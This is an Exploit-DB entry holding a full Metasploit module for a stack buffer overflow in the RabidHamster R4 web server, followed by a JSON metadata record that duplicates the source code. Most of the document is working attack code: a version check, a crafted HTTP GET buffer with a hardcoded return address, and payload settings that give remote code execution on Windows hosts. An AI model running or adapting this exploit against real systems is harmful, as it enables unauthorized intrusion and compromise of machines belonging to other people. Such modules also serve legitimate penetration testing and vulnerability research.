ID EDB-ID:18929 Type exploitdb Reporter metasploit Modified 2012-05-25T00:00:00
Description
RabidHamster R4 Log Entry sprintf() Buffer Overflow. Remote exploit for windows platform
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in RabidHamster R4's web server.
By supplying a malformed HTTP request, it is possible to trigger a stack-based
buffer overflow when generating a log, which may result in arbitrary code
execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '79007'],
['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
['URL', 'http://secunia.com/advisories/47901/']
],
'Payload' =>
{
'StackAdjustment' => -3500,
'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
},
'DefaultOptions' =>
{
'ExitFunction' => "process"
},
'Platform' => 'win',
'Targets' =>
[
['R4 v1.25', {'Ret'=>0x73790533}] #JMP ESI (ddraw.dll)
],
'Privileged' => false,
'DisclosureDate' => "Feb 09 2012",
'DefaultTarget' => 0))
register_options(
[
OptPort.new('RPORT', [true, 'The remote port', 8888])
], self.class)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/'
})
if res and res.headers['Server'] == 'R4 Embedded Server'
return Exploit::CheckCode::Detected
else
return Exploit::CheckCoded::Safe
end
end
def exploit
buf = ''
buf << payload.encoded
buf << rand_text_alpha(2022-buf.length, payload_badchars)
buf << [target.ret].pack("V*")
buf << pattern_create(200)
buf << rand_text_alpha(3000-buf.length, payload_badchars)
send_request_cgi({
'method' => 'GET',
'uri' => "/?#{buf}"
})
end
end
{"id": "EDB-ID:18929", "hash": "05960aeb90c61e94874916d1508d5ea0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "RabidHamster R4 Log Entry sprintf Buffer Overflow", "description": "RabidHamster R4 Log Entry sprintf() Buffer Overflow. Remote exploit for windows platform", "published": "2012-05-25T00:00:00", "modified": "2012-05-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/18929/", "reporter": "metasploit", "references": [], "cvelist": [], "lastseen": "2016-02-02T10:43:42", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2016-02-02T10:43:42"}, "dependencies": {"references": [], "modified": "2016-02-02T10:43:42"}, "vulnersScore": 0.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18929/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"RabidHamster R4 Log Entry sprintf() Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in RabidHamster R4's web server.\r\n\t\t\t\tBy supplying a malformed HTTP request, it is possible to trigger a stack-based\r\n\t\t\t\tbuffer overflow when generating a log, which may result in arbitrary code\r\n\t\t\t\texecution under the context of the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Luigi Auriemma', #Discovery, PoC\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OSVDB', '79007'],\r\n\t\t\t\t\t['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],\r\n\t\t\t\t\t['URL', 'http://secunia.com/advisories/47901/']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'BadChars' => \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x20\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['R4 v1.25', {'Ret'=>0x73790533}] #JMP ESI (ddraw.dll)\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Feb 09 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptPort.new('RPORT', [true, 'The remote port', 8888])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => '/'\r\n\t\t})\r\n\r\n\t\tif res and res.headers['Server'] == 'R4 Embedded Server'\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCoded::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbuf = ''\r\n\t\tbuf << payload.encoded\r\n\t\tbuf << rand_text_alpha(2022-buf.length, payload_badchars)\r\n\t\tbuf << [target.ret].pack(\"V*\")\r\n\t\tbuf << pattern_create(200)\r\n\t\tbuf << rand_text_alpha(3000-buf.length, payload_badchars)\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"/?#{buf}\"\r\n\t\t})\r\n\tend\r\nend\r\n", "osvdbidlist": ["79007"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}